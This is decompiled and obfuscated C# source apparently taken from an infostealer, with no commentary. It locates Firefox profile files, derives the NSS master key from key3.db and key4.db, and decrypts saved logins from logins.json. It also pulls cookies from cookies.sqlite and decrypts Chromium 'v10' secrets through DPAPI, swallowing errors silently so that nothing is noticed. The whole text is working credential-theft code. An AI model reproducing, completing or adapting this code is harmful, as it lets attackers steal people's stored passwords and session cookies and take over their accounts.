// Token: 0x060001D9 RID: 473 RVA: 0x000101CC File Offset: 0x0000E3CC private static byte[] GetPrivate3Key(string file) { byte[] array = new byte[24]; try { if (!File.Exists(file)) { return(array); } new DataTable(); Class_70 berkeleyDB = new Class_70(file); Class_72 class_ = new Class_72(Class_78.ParseDb(berkeleyDB, (string x) => x.Equals("password-check"))); string hexString = Class_78.ParseDb(berkeleyDB, (string x) => x.Equals("global-salt")); Class_71 class_2 = new Class_71(Class_69.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), Class_69.ConvertHexStringToByteArray(class_.prop_0)); class_2.smethod_230(); Class_50.Decrypt(class_2.prop_3, class_2.prop_4, Class_69.ConvertHexStringToByteArray(class_.prop_2), PaddingMode.None); Class_62 class_3 = Class_61.Create(Class_69.ConvertHexStringToByteArray(Class_78.ParseDb(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt")))); Class_71 class_4 = new Class_71(Class_69.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), class_3.prop_3[0].prop_3[0].prop_3[1].prop_3[0].prop_1); class_4.smethod_230(); Class_62 class_5 = Class_61.Create(Class_61.Create(Encoding.Default.GetBytes(Class_50.Decrypt(class_4.prop_3, class_4.prop_4, class_3.prop_3[0].prop_3[1].prop_1, PaddingMode.None))).prop_3[0].prop_3[2].prop_1); if (class_5.prop_3[0].prop_3[3].prop_1.Length > 24) { Array.Copy(class_5.prop_3[0].prop_3[3].prop_1, class_5.prop_3[0].prop_3[3].prop_1.Length - 24, array, 0, 24); } else { array = class_5.prop_3[0].prop_3[3].prop_1; } } catch { } return(array); }
// Token: 0x060001AC RID: 428 RVA: 0x0000E910 File Offset: 0x0000CB10 public static string CreateTempCopy(string filePath) { string text = Class_69.CreateTempPath(); File.Copy(filePath, text, true); return(text); }
// Token: 0x060001B1 RID: 433 RVA: 0x0000EA8C File Offset: 0x0000CC8C public static List <string> FindPaths(string baseDirectory, int maxLevel = 4, int level = 1, params string[] files) { List <string> list = new List <string>(); if (files != null && files.Length != 0 && level <= maxLevel) { try { foreach (string path in Directory.GetDirectories(baseDirectory)) { try { DirectoryInfo directoryInfo = new DirectoryInfo(path); FileInfo[] files2 = directoryInfo.GetFiles(); bool flag = false; int num = 0; while (num < files2.Length && !flag) { int num2 = 0; while (num2 < files.Length && !flag) { string a = files[num2]; FileInfo fileInfo = files2[num]; string name = fileInfo.Name; if (a == name) { flag = true; list.Add(fileInfo.FullName); } num2++; } num++; } foreach (string item in Class_69.FindPaths(directoryInfo.FullName, maxLevel, level + 1, files)) { if (!list.Contains(item)) { list.Add(item); } } } catch { } } } catch { } return(list); } return(list); }
// Token: 0x060001D4 RID: 468 RVA: 0x0000F890 File Offset: 0x0000DA90 public static List <Class_65> ParseBrowsers() { List <Class_65> list = new List <Class_65>(); try { List <string> list2 = new List <string>(); list2.AddRange(Class_69.FindPaths(Class_47.\u0349\u0308t\u0324\u0329\u0306\u033Ae\u0340\u0341\u036B\u0351\u0E47c\u0363\u0363xrkhflctjjgrafhq\u036A\u0E47\u0302\u0368\u0020\u032C\u035E\u0349\u0359\u0020\u0020\u0489\u0333\u030C\u0347\u032Cdfodarkersxinukm, 4, 1, new string[] { "key3.db", "key4.db", "cookies.sqlite", "logins.json" })); list2.AddRange(Class_69.FindPaths(Class_47.\u030A\u0330\u0314\u0E47\u036D\u0020\u0331\u036B\u0310\u0341\u0353\u0333\u035F\u0368\u0333\u0369fscvyixozutspogr\u0316\u0020\u0E47\u0340\u0020\u0325\u035A\u0342\u032F\u0366\u0303\u036D\u0344\u0302\u0338\u032Cmiwjanndutheeold, 4, 1, new string[] { "key3.db", "key4.db", "cookies.sqlite", "logins.json" })); foreach (string text in list2) { string fullName = new FileInfo(text).Directory.FullName; string text2 = text.Contains(Class_47.\u030A\u0330\u0314\u0E47\u036D\u0020\u0331\u036B\u0310\u0341\u0353\u0333\u035F\u0368\u0333\u0369fscvyixozutspogr\u0316\u0020\u0E47\u0340\u0020\u0325\u035A\u0342\u032F\u0366\u0303\u036D\u0344\u0302\u0338\u032Cmiwjanndutheeold) ? Class_78.GetRoamingName(fullName) : Class_78.GetLocalName(fullName); if (!string.IsNullOrEmpty(text2)) { Class_65 class_ = new Class_65 { prop_0 = text2, prop_1 = new DirectoryInfo(fullName).Name, prop_5 = new List <Class_66>(Class_78.ParseCookies(fullName)).IsNull <List <Class_66> >(), prop_2 = new List <Class_68>(Class_78.GetCredentials(fullName).IsNull <List <Class_68> >()).IsNull <List <Class_68> >(), prop_3 = new List <Class_64>(), prop_4 = new List <Class_67>() }; if (class_.prop_5.Count((Class_66 x) => x.IsNotNull <Class_66>()) <= 0) { if (class_.prop_2.Count((Class_68 x) => x.IsNotNull <Class_68>()) <= 0) { continue; } } list.Add(class_); } } } catch { } return(list); }
// Token: 0x06000098 RID: 152 RVA: 0x00005284 File Offset: 0x00003484 private static string pmethod_69(string str_0, string str_1) { int num = 12; string text = "v10"; string text2 = "DPAPI"; string empty = string.Empty; string s = File.ReadAllText(str_0).FromJSON().tmethod_322("os_crypt").tmethod_322("encrypted_key").gmethod_333(false); string s2 = Encoding.Default.GetString(Convert.FromBase64String(s)).Substring(text2.Length); byte[] key = Class_69.DecryptBlob(Encoding.Default.GetBytes(s2), DataProtectionScope.CurrentUser, null); byte[] bytes = Encoding.Default.GetBytes(str_1.Substring(text.Length, num)); return(Class_28.Decrypt(Encoding.Default.GetBytes(str_1.Substring(num + text.Length)), key, bytes)); }
// Token: 0x060001D6 RID: 470 RVA: 0x0000FB58 File Offset: 0x0000DD58 private static List <Class_66> ParseCookies(string profile) { List <Class_66> list = new List <Class_66>(); try { string text = Path.Combine(profile, "cookies.sqlite"); if (!File.Exists(text)) { return(list); } Class_108 class_ = new Class_108(Class_69.CreateTempCopy(text)); class_.smethod_400("moz_cookies"); for (int i = 0; i < class_.prop_3; i++) { Class_66 class_2 = null; try { class_2 = new Class_66 { prop_0 = class_.pmethod_399(i, "host").Trim(), prop_1 = (class_.pmethod_399(i, "isSecure") == "1"), prop_2 = class_.pmethod_399(i, "path").Trim(), prop_3 = (class_.pmethod_399(i, "isSecure") == "1"), prop_4 = class_.pmethod_399(i, "expiry").Trim(), prop_5 = class_.pmethod_399(i, "name").Trim(), prop_6 = class_.pmethod_399(i, "value") }; Class_78.\u036B\u034B\u031F\u031D\u0E47\u031C\u0301\u034E\u0353\u0306\u0347\u033D\u0331\u0353\u0343\u0020hupvdimgmomeaylzst\u0303\u035D\u033F\u035B\u0309\u0020\u032E\u032F\u0348\u0359\u034B\u0020\u0489\u035Blscnvhohzjystpki++; } catch { } if (class_2 != null) { list.Add(class_2); } } } catch { } return(list); }
// Token: 0x06000097 RID: 151 RVA: 0x00005218 File Offset: 0x00003418 public static string lmethod_68(string str_0, string str_1) { string text = string.Empty; string result; try { if (str_0.StartsWith("v10")) { text = Class_25.pmethod_69(str_1, str_0); result = text; } else { text = Class_69.DecryptBlob(str_0, DataProtectionScope.CurrentUser, null).Trim(); result = text; } } catch { result = text; } return(result); }
// Token: 0x060001D7 RID: 471 RVA: 0x0000FCE8 File Offset: 0x0000DEE8 private static List <Class_68> ParseLogins(string profile, byte[] privateKey) { List <Class_68> list = new List <Class_68>(); try { string path = Class_69.CreateTempCopy(Path.Combine(profile, "logins.json")); if (!File.Exists(path)) { return(list); } foreach (object obj in ((IEnumerable)File.ReadAllText(path).FromJSON().tmethod_322("logins"))) { Class_103 class_ = (Class_103)obj; Class_62 class_2 = Class_61.Create(Convert.FromBase64String(class_.tmethod_322("encryptedUsername").gmethod_333(false))); Class_62 class_3 = Class_61.Create(Convert.FromBase64String(class_.tmethod_322("encryptedPassword").gmethod_333(false))); string text = Regex.Replace(Class_50.Decrypt(privateKey, class_2.prop_3[0].prop_3[1].prop_3[1].prop_1, class_2.prop_3[0].prop_3[2].prop_1, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(Class_50.Decrypt(privateKey, class_3.prop_3[0].prop_3[1].prop_3[1].prop_1, class_3.prop_3[0].prop_3[2].prop_1, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); Class_68 class_4 = new Class_68 { prop_0 = (string.IsNullOrEmpty(class_.tmethod_322("hostname").gmethod_333(false)) ? "UNKNOWN" : class_.tmethod_322("hostname").gmethod_333(false)), prop_1 = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text), prop_2 = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2) }; if (class_4.prop_1 != "UNKNOWN" && class_4.prop_2 != "UNKNOWN" && class_4.prop_0 != "UNKNOWN") { list.Add(class_4); Class_78.\u0340\u035A\u0020\u0020\u0320\u034E\u035Ct\u033C\u030C\u0361\u0329\u0338\u0342\u032E\u0E47vktldwvagjgorsqs\u0020\u033F\u0339\u0020\u0342\u0489\u0342\u0342\u0309\u0308\u0358\u0348\u0329\u035C\u0310ixunljsevrvauyudk++; } } } catch { } return(list); }
// Token: 0x060001D5 RID: 469 RVA: 0x0000FAB0 File Offset: 0x0000DCB0 private static List <Class_68> GetCredentials(string profile) { List <Class_68> list = new List <Class_68>(); try { if (File.Exists(Path.Combine(profile, "key3.db"))) { list.AddRange(Class_78.ParseLogins(profile, Class_78.GetPrivate3Key(Class_69.CreateTempCopy(Path.Combine(profile, "key3.db"))))); } if (File.Exists(Path.Combine(profile, "key4.db"))) { list.AddRange(Class_78.ParseLogins(profile, Class_78.GetPrivate4Key(Class_69.CreateTempCopy(Path.Combine(profile, "key4.db"))))); } } catch { } return(list); }
// Token: 0x060001AE RID: 430 RVA: 0x0000E99B File Offset: 0x0000CB9B public static string DecryptBlob(string EncryptedData, DataProtectionScope dataProtectionScope, byte[] entropy = null) { return(Encoding.UTF8.GetString(Class_69.DecryptBlob(Encoding.Default.GetBytes(EncryptedData), dataProtectionScope, entropy))); }